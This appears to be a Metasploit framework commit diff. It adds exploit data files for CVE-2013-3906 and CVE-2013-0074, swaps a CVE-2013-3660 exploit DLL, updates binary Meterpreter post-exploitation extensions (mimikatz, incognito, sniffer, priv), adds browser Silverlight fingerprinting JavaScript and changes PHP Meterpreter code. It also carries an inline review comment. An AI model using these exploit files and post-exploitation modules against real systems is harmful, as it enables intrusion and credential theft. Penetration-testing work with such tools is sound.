diff --git a/.gitmodules b/.gitmodules new file mode 100644 index 0000000000..564edab544 --- /dev/null +++ b/.gitmodules @@ -0,0 +1,3 @@ +[submodule "external/source/ReflectiveDLLInjection"] + path = external/source/ReflectiveDLLInjection + url = https://github.com/rapid7/ReflectiveDLLInjection.git diff --git a/.mailmap b/.mailmap index 2901c8bc5c..459d4a064e 100644 --- a/.mailmap +++ b/.mailmap @@ -20,7 +20,7 @@ wchen-r7 sinn3r # aka sinn3r wchen-r7 sinn3r wchen-r7 Wei Chen wvu-r7 William Vu -wvu-r7 William Vu +wvu-r7 William Vu # Above this line are current Rapid7 employees. Below this paragraph are # volunteers, former employees, and potential Rapid7 employees who, at @@ -40,8 +40,8 @@ Chao-mu chao-mu Chao-mu chao-mu ChrisJohnRiley Chris John Riley ChrisJohnRiley Chris John Riley -corelanc0d3er corelanc0d3r -corelanc0d3er Peter Van Eeckhoutte (corelanc0d3r) +corelanc0d3r corelanc0d3r +corelanc0d3r Peter Van Eeckhoutte (corelanc0d3r) darkoperator Carlos Perez efraintorres efraintorres efraintorres et <> diff --git a/.ruby-version b/.ruby-version index c82eec79ee..7a895c2142 100644 --- a/.ruby-version +++ b/.ruby-version @@ -1 +1 @@ -1.9.3-p448 +1.9.3-p484 diff --git a/Gemfile b/Gemfile index 0f0282ae07..26b450c436 100755 --- a/Gemfile +++ b/Gemfile 
@@ -14,50 +14,50 @@ gem 'robots' gem 'packetfu', '1.1.9' group :db do - # Needed for Msf::DbManager - gem 'activerecord' - # Database models shared between framework and Pro. - gem 'metasploit_data_models', '~> 0.16.6' - # Needed for module caching in Mdm::ModuleDetails - gem 'pg', '>= 0.11' + # Needed for Msf::DbManager + gem 'activerecord' + # Database models shared between framework and Pro. + gem 'metasploit_data_models', '~> 0.16.6' + # Needed for module caching in Mdm::ModuleDetails + gem 'pg', '>= 0.11' end group :pcap do gem 'network_interface', '~> 0.0.1' - # For sniffer and raw socket modules - gem 'pcaprub' + # For sniffer and raw socket modules + gem 'pcaprub' end group :development do - # Markdown formatting for yard - gem 'redcarpet' - # generating documentation - gem 'yard' + # Markdown formatting for yard + gem 'redcarpet' + # generating documentation + gem 'yard' end group :development, :test do - # supplies factories for producing model instance for specs - # Version 4.1.0 or newer is needed to support generate calls without the - # 'FactoryGirl.' in factory definitions syntax. - gem 'factory_girl', '>= 4.1.0' -# Make rspec output shorter and more useful - gem 'fivemat', '1.2.1' - # running documentation generation tasks and rspec tasks - gem 'rake', '>= 10.0.0' + # supplies factories for producing model instance for specs + # Version 4.1.0 or newer is needed to support generate calls without the + # 'FactoryGirl.' in factory definitions syntax. + gem 'factory_girl', '>= 4.1.0' + # Make rspec output shorter and more useful + gem 'fivemat', '1.2.1' + # running documentation generation tasks and rspec tasks + gem 'rake', '>= 10.0.0' end group :test do - # Removes records from database created during tests. Can't use rspec-rails' - # transactional fixtures because multiple connections are in use so - # transactions won't work. 
- gem 'database_cleaner' - # testing framework - gem 'rspec', '>= 2.12' - gem 'shoulda-matchers' - # code coverage for tests - # any version newer than 0.5.4 gives an Encoding error when trying to read the source files. - # see: https://github.com/colszowka/simplecov/issues/127 (hopefully fixed in 0.8.0) - gem 'simplecov', '0.5.4', :require => false - # Manipulate Time.now in specs - gem 'timecop' + # Removes records from database created during tests. Can't use rspec-rails' + # transactional fixtures because multiple connections are in use so + # transactions won't work. + gem 'database_cleaner' + # testing framework + gem 'rspec', '>= 2.12' + gem 'shoulda-matchers' + # code coverage for tests + # any version newer than 0.5.4 gives an Encoding error when trying to read the source files. + # see: https://github.com/colszowka/simplecov/issues/127 (hopefully fixed in 0.8.0) + gem 'simplecov', '0.5.4', :require => false + # Manipulate Time.now in specs + gem 'timecop' end diff --git a/data/exploits/CVE-2013-3906/_rels/.rels b/data/exploits/CVE-2013-3906/_rels/.rels new file mode 100755 index 0000000000..bf27b7dd5f --- /dev/null +++ b/data/exploits/CVE-2013-3906/_rels/.rels @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git a/data/exploits/CVE-2013-3906/docProps/app.xml b/data/exploits/CVE-2013-3906/docProps/app.xml new file mode 100755 index 0000000000..fda5bfdf05 --- /dev/null +++ b/data/exploits/CVE-2013-3906/docProps/app.xml @@ -0,0 +1,19 @@ + + + +4 +1 +217 +1238 +Microsoft Office Word +0 +10 +2 +false +home +false +1453 +false +false +12.0000 + \ No newline at end of file diff --git a/data/exploits/CVE-2013-3906/docProps/core.xml b/data/exploits/CVE-2013-3906/docProps/core.xml new file mode 100755 index 0000000000..d1b1819ff6 --- /dev/null +++ b/data/exploits/CVE-2013-3906/docProps/core.xml @@ -0,0 +1,8 @@ + + +Win7 +Win7 +1 +2013-10-03T22:46:00Z +2013-10-03T23:17:00Z + \ No newline at end of file 
diff --git a/data/exploits/CVE-2013-3906/word/charts/_rels/chart1.xml.rels b/data/exploits/CVE-2013-3906/word/charts/_rels/chart1.xml.rels new file mode 100755 index 0000000000..eccb5ced00 --- /dev/null +++ b/data/exploits/CVE-2013-3906/word/charts/_rels/chart1.xml.rels @@ -0,0 +1,4 @@ + + + + \ No newline at end of file diff --git a/data/exploits/CVE-2013-3906/word/charts/_rels/chart2.xml.rels b/data/exploits/CVE-2013-3906/word/charts/_rels/chart2.xml.rels new file mode 100755 index 0000000000..99575aefc3 --- /dev/null +++ b/data/exploits/CVE-2013-3906/word/charts/_rels/chart2.xml.rels @@ -0,0 +1,4 @@ + + + + \ No newline at end of file diff --git a/data/exploits/CVE-2013-3906/word/charts/_rels/chart3.xml.rels b/data/exploits/CVE-2013-3906/word/charts/_rels/chart3.xml.rels new file mode 100755 index 0000000000..1ed09c997d --- /dev/null +++ b/data/exploits/CVE-2013-3906/word/charts/_rels/chart3.xml.rels @@ -0,0 +1,4 @@ + + + + \ No newline at end of file diff --git a/data/exploits/CVE-2013-3906/word/charts/_rels/chart4.xml.rels b/data/exploits/CVE-2013-3906/word/charts/_rels/chart4.xml.rels new file mode 100755 index 0000000000..da6e235036 --- /dev/null +++ b/data/exploits/CVE-2013-3906/word/charts/_rels/chart4.xml.rels @@ -0,0 +1,4 @@ + + + + \ No newline at end of file diff --git a/data/exploits/CVE-2013-3906/word/charts/_rels/chart5.xml.rels b/data/exploits/CVE-2013-3906/word/charts/_rels/chart5.xml.rels new file mode 100755 index 0000000000..de95b488db --- /dev/null +++ b/data/exploits/CVE-2013-3906/word/charts/_rels/chart5.xml.rels @@ -0,0 +1,4 @@ + + + + \ No newline at end of file diff --git a/data/exploits/CVE-2013-3906/word/charts/_rels/chart6.xml.rels b/data/exploits/CVE-2013-3906/word/charts/_rels/chart6.xml.rels new file mode 100755 index 0000000000..8bbd9603de --- /dev/null +++ b/data/exploits/CVE-2013-3906/word/charts/_rels/chart6.xml.rels @@ -0,0 +1,4 @@ + + + + \ No newline at end of file 
diff --git a/data/exploits/CVE-2013-3906/word/charts/chart1.xml b/data/exploits/CVE-2013-3906/word/charts/chart1.xml new file mode 100755 index 0000000000..22a44c771d --- /dev/null +++ b/data/exploits/CVE-2013-3906/word/charts/chart1.xml @@ -0,0 +1,230 @@ + + + + + + + + + + + + + + + + + +Sheet1!$B$1 + + + +Series 1 + + + + + + +Sheet1!$A$2:$A$5 + + + +Category 1 + + +Category 2 + + +Category 3 + + +Category 4 + + + + + + +Sheet1!$B$2:$B$5 + +General + + +4.3 + + +2.5 + + +3.5 + + +4.5 + + + + + + + + + + +Sheet1!$C$1 + + + +Series 2 + + + + + + +Sheet1!$A$2:$A$5 + + + +Category 1 + + +Category 2 + + +Category 3 + + +Category 4 + + + + + + +Sheet1!$C$2:$C$5 + +General + + +2.4 + + +4.4000000000000004 + + +1.8 + + +2.8 + + + + + + + + + + +Sheet1!$D$1 + + + +Series 3 + + + + + + +Sheet1!$A$2:$A$5 + + + +Category 1 + + +Category 2 + + +Category 3 + + +Category 4 + + + + + + +Sheet1!$D$2:$D$5 + +General + + +2 + + +2 + + +3 + + +5 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/data/exploits/CVE-2013-3906/word/charts/chart2.xml b/data/exploits/CVE-2013-3906/word/charts/chart2.xml new file mode 100755 index 0000000000..cafdd358c1 --- /dev/null +++ b/data/exploits/CVE-2013-3906/word/charts/chart2.xml 
@@ -0,0 +1,220 @@ + + + + + + + + + + + + + + + + + +Sheet1!$B$1 + + + +Series 1 + + + + + + +Sheet1!$A$2:$A$5 + + + +Category 1 + + +Category 2 + + +Category 3 + + +Category 4 + + + + + + +Sheet1!$B$2:$B$5 + +General + + +4.3 + + +2.5 + + +3.5 + + +4.5 + + + + + + + + + + +Sheet1!$C$1 + + + +Series 2 + + + + + + +Sheet1!$A$2:$A$5 + + + +Category 1 + + +Category 2 + + +Category 3 + + +Category 4 + + + + + + +Sheet1!$C$2:$C$5 + +General + + +2.4 + + +4.4000000000000004 + + +1.8 + + +2.8 + + + + + + + + + + +Sheet1!$D$1 + + + +Series 3 + + + + + + +Sheet1!$A$2:$A$5 + + + +Category 1 + + +Category 2 + + +Category 3 + + +Category 4 + + + + + + +Sheet1!$D$2:$D$5 + +General + + +2 + + +2 + + +3 + + +5 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/data/exploits/CVE-2013-3906/word/charts/chart3.xml b/data/exploits/CVE-2013-3906/word/charts/chart3.xml new file mode 100755 index 0000000000..0b4c47a1a9 --- /dev/null +++ b/data/exploits/CVE-2013-3906/word/charts/chart3.xml @@ -0,0 +1,230 @@ + + + + + + + + + + + + + + + + + +Sheet1!$B$1 + + + +Series 1 + + + + + + +Sheet1!$A$2:$A$5 + + + +Category 1 + + +Category 2 + + +Category 3 + + +Category 4 + + + + + + +Sheet1!$B$2:$B$5 + +General + + +4.3 + + +2.5 + + +3.5 + + +4.5 + + + + + + + + + + +Sheet1!$C$1 + + + +Series 2 + + + + + + +Sheet1!$A$2:$A$5 + + + +Category 1 + + +Category 2 + + +Category 3 + + +Category 4 + + + + + + +Sheet1!$C$2:$C$5 + +General + + +2.4 + + +4.4000000000000004 + + +1.8 + + +2.8 + + + + + + + + + + +Sheet1!$D$1 + + + +Series 3 + + + + + + +Sheet1!$A$2:$A$5 + + + +Category 1 + + +Category 2 + + +Category 3 + + +Category 4 + + + + + + +Sheet1!$D$2:$D$5 + +General + + +2 + + +2 + + +3 + + +5 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file 
diff --git a/data/exploits/CVE-2013-3906/word/charts/chart4.xml b/data/exploits/CVE-2013-3906/word/charts/chart4.xml new file mode 100755 index 0000000000..da8085b066 --- /dev/null +++ b/data/exploits/CVE-2013-3906/word/charts/chart4.xml @@ -0,0 +1,110 @@ + + + + + + + + + + + + + + + + + + + + + +Sheet1!$B$1 + + + +Sales + + + + + + +Sheet1!$A$2:$A$5 + + + +Sq.. 1 + + +Sq.. 2 + + +Sq.. 3 + + +Sq.. 4 + + + + + + +Sheet1!$B$2:$B$5 + +General + + +8.1999999999999993 + + +3.2 + + +1.4 + + +1.2 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/data/exploits/CVE-2013-3906/word/charts/chart5.xml b/data/exploits/CVE-2013-3906/word/charts/chart5.xml new file mode 100755 index 0000000000..061cf33531 --- /dev/null +++ b/data/exploits/CVE-2013-3906/word/charts/chart5.xml @@ -0,0 +1,228 @@ + + + + + + + + + + + + + + + + +Sheet1!$B$1 + + + +Series 1 + + + + + + +Sheet1!$A$2:$A$5 + + + +Category 1 + + +Category 2 + + +Category 3 + + +Category 4 + + + + + + +Sheet1!$B$2:$B$5 + +General + + +4.3 + + +2.5 + + +3.5 + + +4.5 + + + + + + + + + + +Sheet1!$C$1 + + + +Series 2 + + + + + + +Sheet1!$A$2:$A$5 + + + +Category 1 + + +Category 2 + + +Category 3 + + +Category 4 + + + + + + +Sheet1!$C$2:$C$5 + +General + + +2.4 + + +4.4000000000000004 + + +1.8 + + +2.8 + + + + + + + + + + +Sheet1!$D$1 + + + +Series 3 + + + + + + +Sheet1!$A$2:$A$5 + + + +Category 1 + + +Category 2 + + +Category 3 + + +Category 4 + + + + + + +Sheet1!$D$2:$D$5 + +General + + +2 + + +2 + + +3 + + +5 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/data/exploits/CVE-2013-3906/word/charts/chart6.xml b/data/exploits/CVE-2013-3906/word/charts/chart6.xml new file mode 100755 index 0000000000..63ca82beda --- /dev/null +++ b/data/exploits/CVE-2013-3906/word/charts/chart6.xml 
@@ -0,0 +1,238 @@ + + + + + + + + + + + + + + + +Sheet1!$B$1 + + + +Series 1 + + + + + + +Sheet1!$A$2:$A$5 + + + +Category 1 + + +Category 2 + + +Category 3 + + +Category 4 + + + + + + +Sheet1!$B$2:$B$5 + +General + + +4.3 + + +2.5 + + +3.5 + + +4.5 + + + + + + + + + + +Sheet1!$C$1 + + + +Series 2 + + + + + + +Sheet1!$A$2:$A$5 + + + +Category 1 + + +Category 2 + + +Category 3 + + +Category 4 + + + + + + +Sheet1!$C$2:$C$5 + +General + + +2.4 + + +4.4000000000000004 + + +1.8 + + +2.8 + + + + + + + + + + +Sheet1!$D$1 + + + +Series 3 + + + + + + +Sheet1!$A$2:$A$5 + + + +Category 1 + + +Category 2 + + +Category 3 + + +Category 4 + + + + + + +Sheet1!$D$2:$D$5 + +General + + +2 + + +2 + + +3 + + +5 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet1.xlsx b/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet1.xlsx new file mode 100755 index 0000000000..73575cba24 Binary files /dev/null and b/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet1.xlsx differ diff --git a/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet2.xlsx b/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet2.xlsx new file mode 100755 index 0000000000..9ff454e76f Binary files /dev/null and b/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet2.xlsx differ diff --git a/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet3.xlsx b/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet3.xlsx new file mode 100755 index 0000000000..47c4681188 Binary files /dev/null and b/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet3.xlsx differ 
diff --git a/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet4.xlsx b/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet4.xlsx new file mode 100755 index 0000000000..30b4817db4 Binary files /dev/null and b/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet4.xlsx differ diff --git a/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet5.xlsx b/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet5.xlsx new file mode 100755 index 0000000000..60bfccf3c6 Binary files /dev/null and b/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet5.xlsx differ diff --git a/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet6.xlsx b/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet6.xlsx new file mode 100755 index 0000000000..e74fe9072f Binary files /dev/null and b/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet6.xlsx differ diff --git a/data/exploits/CVE-2013-3906/word/fontTable.xml b/data/exploits/CVE-2013-3906/word/fontTable.xml new file mode 100755 index 0000000000..06076bd466 --- /dev/null +++ b/data/exploits/CVE-2013-3906/word/fontTable.xml @@ -0,0 +1,31 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/data/exploits/CVE-2013-3906/word/media/image1.jpeg b/data/exploits/CVE-2013-3906/word/media/image1.jpeg new file mode 100755 index 0000000000..9795917505 Binary files /dev/null and b/data/exploits/CVE-2013-3906/word/media/image1.jpeg differ diff --git a/data/exploits/CVE-2013-3906/word/settings.xml b/data/exploits/CVE-2013-3906/word/settings.xml new file mode 100755 index 0000000000..e28f493ffb --- /dev/null +++ b/data/exploits/CVE-2013-3906/word/settings.xml @@ -0,0 +1,36 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file 
diff --git a/data/exploits/CVE-2013-3906/word/styles.xml b/data/exploits/CVE-2013-3906/word/styles.xml new file mode 100755 index 0000000000..b950e6138a --- /dev/null +++ b/data/exploits/CVE-2013-3906/word/styles.xml @@ -0,0 +1,220 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/data/exploits/CVE-2013-3906/word/theme/theme1.xml b/data/exploits/CVE-2013-3906/word/theme/theme1.xml new file mode 100755 index 0000000000..42767537be --- /dev/null +++ b/data/exploits/CVE-2013-3906/word/theme/theme1.xml @@ -0,0 +1,283 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/data/exploits/CVE-2013-3906/word/webSettings.xml b/data/exploits/CVE-2013-3906/word/webSettings.xml new file mode 100755 index 0000000000..c57f94f356 --- /dev/null +++ b/data/exploits/CVE-2013-3906/word/webSettings.xml @@ -0,0 +1,4 @@ + + + + \ No newline at end of file 
diff --git a/data/exploits/cve-2013-0074/SilverApp1.dll b/data/exploits/cve-2013-0074/SilverApp1.dll new file mode 100755 index 0000000000..87ea67ba4b Binary files /dev/null and b/data/exploits/cve-2013-0074/SilverApp1.dll differ diff --git a/data/exploits/cve-2013-0074/SilverApp1.xap b/data/exploits/cve-2013-0074/SilverApp1.xap new file mode 100755 index 0000000000..77907f982f Binary files /dev/null and b/data/exploits/cve-2013-0074/SilverApp1.xap differ diff --git a/data/exploits/cve-2013-3660/exploit.dll b/data/exploits/cve-2013-3660/exploit.dll deleted file mode 100755 index cbb761b568..0000000000 Binary files a/data/exploits/cve-2013-3660/exploit.dll and /dev/null differ diff --git a/data/exploits/cve-2013-3660/ppr_flatten_rec.x86.dll b/data/exploits/cve-2013-3660/ppr_flatten_rec.x86.dll new file mode 100755 index 0000000000..888d31339a Binary files /dev/null and b/data/exploits/cve-2013-3660/ppr_flatten_rec.x86.dll differ diff --git a/data/js/detect/misc_addons.js b/data/js/detect/misc_addons.js index 434a145791..2deaed1252 100644 --- a/data/js/detect/misc_addons.js +++ b/data/js/detect/misc_addons.js 
@@ -1,5 +1,51 @@ window.misc_addons_detect = { }; + +/** + * Detects whether the browser supports Silverlight or not + **/ +window.misc_addons_detect.hasSilverlight = function () { + var found = false; + + // + // When on IE, we can use AgControl.AgControl to actually detect the version too. + // But this ability is specific to IE, so we fall back to just true/false response + // + try { + var ax = new ActiveXObject('AgControl.AgControl'); + found = true; + } catch(e) {} + + // + // ActiveX didn't get anything, try looking in MIMEs + // + if (!found) { + var mimes = window.navigator.mimeTypes; + for (var i=0; i < mimes.length; i++) { + if (/x\-silverlight/.test(mimes[i].type)) { + found = true; + break; + } + } + } + + // + // MIMEs didn't work either. Try navigator. + // + if (!found) { + var count = navigator.plugins.length; + for (var i=0; i < count; i++) { + var pluginName = navigator.plugins[i].name; + if (/Silverlight Plug\-In/.test(pluginName)) { + found = true; + break; + } + } + } + + return found; +} + /** * Returns the Java version **/ diff --git a/data/meterpreter/elevator.x64.dll b/data/meterpreter/elevator.x64.dll index 201d39a28c..6122e0d4ec 100755 Binary files a/data/meterpreter/elevator.x64.dll and b/data/meterpreter/elevator.x64.dll differ diff --git a/data/meterpreter/elevator.x86.dll b/data/meterpreter/elevator.x86.dll index 1aa9edd055..4b377f7577 100755 Binary files a/data/meterpreter/elevator.x86.dll and b/data/meterpreter/elevator.x86.dll differ diff --git a/data/meterpreter/ext_server_espia.x64.dll b/data/meterpreter/ext_server_espia.x64.dll index c798efbea9..36bd78ef87 100755 Binary files a/data/meterpreter/ext_server_espia.x64.dll and b/data/meterpreter/ext_server_espia.x64.dll differ diff --git a/data/meterpreter/ext_server_espia.x86.dll b/data/meterpreter/ext_server_espia.x86.dll index 1c5473b0c5..8608ac3cb5 100755 Binary files a/data/meterpreter/ext_server_espia.x86.dll and b/data/meterpreter/ext_server_espia.x86.dll differ 
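Review bot: Both `for` loops in `hasSilverlight` declare `var i`, and `ax` in the `try` block is assigned but never read. `var` is function-scoped, so the second declaration is a harmless redeclaration at runtime, but it reads as two distinct variables and lint tools flag it; hoist a single `var i;` (or use `var j` in the plugins loop) and replace `var ax = new ActiveXObject('AgControl.AgControl');` with a bare `new ActiveXObject('AgControl.AgControl');`. The function expression assigned to `window.misc_addons_detect.hasSilverlight` ends in a bare `}` where an assignment should close with `};`, relying on semicolon insertion. The docblock says what is detected but not what is returned; add `* @return {Boolean} true if the ActiveX control, a Silverlight MIME type or the plug-in was found, false otherwise`.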
diff --git a/data/meterpreter/ext_server_incognito.x64.dll b/data/meterpreter/ext_server_incognito.x64.dll index ac4c0671b2..777f6c3682 100755 Binary files a/data/meterpreter/ext_server_incognito.x64.dll and b/data/meterpreter/ext_server_incognito.x64.dll differ diff --git a/data/meterpreter/ext_server_incognito.x86.dll b/data/meterpreter/ext_server_incognito.x86.dll index e4abf8f237..7369f7621a 100755 Binary files a/data/meterpreter/ext_server_incognito.x86.dll and b/data/meterpreter/ext_server_incognito.x86.dll differ diff --git a/data/meterpreter/ext_server_lanattacks.x64.dll b/data/meterpreter/ext_server_lanattacks.x64.dll index fa11081c3c..4042a413f1 100755 Binary files a/data/meterpreter/ext_server_lanattacks.x64.dll and b/data/meterpreter/ext_server_lanattacks.x64.dll differ diff --git a/data/meterpreter/ext_server_lanattacks.x86.dll b/data/meterpreter/ext_server_lanattacks.x86.dll index 0cb0d5d11d..372df0a5fa 100755 Binary files a/data/meterpreter/ext_server_lanattacks.x86.dll and b/data/meterpreter/ext_server_lanattacks.x86.dll differ diff --git a/data/meterpreter/ext_server_mimikatz.x64.dll b/data/meterpreter/ext_server_mimikatz.x64.dll index e31ae790f5..09ec5e887b 100755 Binary files a/data/meterpreter/ext_server_mimikatz.x64.dll and b/data/meterpreter/ext_server_mimikatz.x64.dll differ diff --git a/data/meterpreter/ext_server_mimikatz.x86.dll b/data/meterpreter/ext_server_mimikatz.x86.dll index 4bb55fe627..d0c6b54447 100755 Binary files a/data/meterpreter/ext_server_mimikatz.x86.dll and b/data/meterpreter/ext_server_mimikatz.x86.dll differ diff --git a/data/meterpreter/ext_server_priv.x64.dll b/data/meterpreter/ext_server_priv.x64.dll index ecaa7f4867..cbdbd29fab 100755 Binary files a/data/meterpreter/ext_server_priv.x64.dll and b/data/meterpreter/ext_server_priv.x64.dll differ 
diff --git a/data/meterpreter/ext_server_priv.x86.dll b/data/meterpreter/ext_server_priv.x86.dll index f23d16c37c..7471006016 100755 Binary files a/data/meterpreter/ext_server_priv.x86.dll and b/data/meterpreter/ext_server_priv.x86.dll differ diff --git a/data/meterpreter/ext_server_sniffer.x64.dll b/data/meterpreter/ext_server_sniffer.x64.dll index 25ca00b2e4..5008d8d9d6 100755 Binary files a/data/meterpreter/ext_server_sniffer.x64.dll and b/data/meterpreter/ext_server_sniffer.x64.dll differ diff --git a/data/meterpreter/ext_server_sniffer.x86.dll b/data/meterpreter/ext_server_sniffer.x86.dll index c2a49293ac..d64f9085a7 100755 Binary files a/data/meterpreter/ext_server_sniffer.x86.dll and b/data/meterpreter/ext_server_sniffer.x86.dll differ diff --git a/data/meterpreter/ext_server_stdapi.php b/data/meterpreter/ext_server_stdapi.php index 4a7df401e6..20cbc03793 100755 --- a/data/meterpreter/ext_server_stdapi.php +++ b/data/meterpreter/ext_server_stdapi.php @@ -78,6 +78,14 @@ define("TLV_TYPE_VALUE_DATA", TLV_META_TYPE_RAW | 1012); define("TLV_TYPE_COMPUTER_NAME", TLV_META_TYPE_STRING | 1040); define("TLV_TYPE_OS_NAME", TLV_META_TYPE_STRING | 1041); define("TLV_TYPE_USER_NAME", TLV_META_TYPE_STRING | 1042); +define("TLV_TYPE_ARCHITECTURE", TLV_META_TYPE_STRING | 1043); +define("TLV_TYPE_LANG_SYSTEM", TLV_META_TYPE_STRING | 1044); + +# Environment +define("TLV_TYPE_ENV_VARIABLE", TLV_META_TYPE_STRING | 1100); +define("TLV_TYPE_ENV_VALUE", TLV_META_TYPE_STRING | 1101); +define("TLV_TYPE_ENV_GROUP", TLV_META_TYPE_GROUP | 1102); + define("DELETE_KEY_FLAG_RECURSIVE", (1 << 0)); @@ -162,7 +170,7 @@ define("ERROR_CONNECTION_ERROR", 10000); # eval'd twice my_print("Evaling stdapi"); -## +## # Search Helpers ## 
@@ -197,38 +205,38 @@ define('GLOB_RECURSE',2048); */ if (!function_exists('safe_glob')) { function safe_glob($pattern, $flags=0) { - $split=explode('/',str_replace('\\','/',$pattern)); - $mask=array_pop($split); - $path=implode('/',$split); - if (($dir=opendir($path))!==false) { - $glob=array(); - while (($file=readdir($dir))!==false) { - // Recurse subdirectories (GLOB_RECURSE) - if ( - ( - $flags&GLOB_RECURSE) && is_dir($path."/".$file) - && (!in_array($file,array('.','..')) - # don't follow links to avoid infinite recursion - && (!is_link($path."/".$file)) - ) - ) { - $glob = array_merge($glob, array_prepend(safe_glob($path.'/'.$file.'/'.$mask, $flags), - ($flags&GLOB_PATH?'':$file.'/'))); + $split=explode('/',str_replace('\\','/',$pattern)); + $mask=array_pop($split); + $path=implode('/',$split); + if (($dir=opendir($path))!==false) { + $glob=array(); + while (($file=readdir($dir))!==false) { + // Recurse subdirectories (GLOB_RECURSE) + if ( + ( + $flags&GLOB_RECURSE) && is_dir($path."/".$file) + && (!in_array($file,array('.','..')) + # don't follow links to avoid infinite recursion + && (!is_link($path."/".$file)) + ) + ) { + $glob = array_merge($glob, array_prepend(safe_glob($path.'/'.$file.'/'.$mask, $flags), + ($flags&GLOB_PATH?'':$file.'/'))); } - // Match file mask - if (fnmatch($mask,$file)) { - if ( ( (!($flags&GLOB_ONLYDIR)) || is_dir("$path/$file") ) - && ( (!($flags&GLOB_NODIR)) || (!is_dir($path.'/'.$file)) ) - && ( (!($flags&GLOB_NODOTS)) || (!in_array($file,array('.','..'))) ) ) - $glob[] = ($flags&GLOB_PATH?$path.'/':'') . $file . 
($flags&GLOB_MARK?'/':''); - } - } - closedir($dir); - if (!($flags&GLOB_NOSORT)) sort($glob); - return $glob; - } else { - return false; - } + // Match file mask + if (fnmatch($mask,$file)) { + if ( ( (!($flags&GLOB_ONLYDIR)) || is_dir("$path/$file") ) + && ( (!($flags&GLOB_NODIR)) || (!is_dir($path.'/'.$file)) ) + && ( (!($flags&GLOB_NODOTS)) || (!in_array($file,array('.','..'))) ) ) + $glob[] = ($flags&GLOB_PATH?$path.'/':'') . $file . ($flags&GLOB_MARK?'/':''); + } + } + closedir($dir); + if (!($flags&GLOB_NOSORT)) sort($glob); + return $glob; + } else { + return false; + } } } /** @@ -239,7 +247,7 @@ function safe_glob($pattern, $flags=0) { */ if (!function_exists('fnmatch')) { function fnmatch($pattern, $string) { - return @preg_match('/^' . strtr(addcslashes($pattern, '\\/.+^$(){}=!<>|'), array('*' => '.*', '?' => '.?')) . '$/i', $string); + return @preg_match('/^' . strtr(addcslashes($pattern, '\\/.+^$(){}=!<>|'), array('*' => '.*', '?' => '.?')) . '$/i', $string); } } @@ -261,7 +269,7 @@ function array_prepend($array, $string, $deep=false) { else $array[$key] = $string.$element; return $array; - + } } @@ -519,13 +527,13 @@ function stdapi_fs_md5($req, &$pkt) { $path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH); $path = cononicalize_path($path_tlv['value']); - if (is_callable("md5_file")) { - $md5 = md5_file($path); - } else { - $md5 = md5(file_get_contents($path)); - } - $md5 = pack("H*", $md5); - # Ghetto abuse of file name type to indicate the md5 result + if (is_callable("md5_file")) { + $md5 = md5_file($path); + } else { + $md5 = md5(file_get_contents($path)); + } + $md5 = pack("H*", $md5); + # Ghetto abuse of file name type to indicate the md5 result packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $md5)); return ERROR_SUCCESS; } 
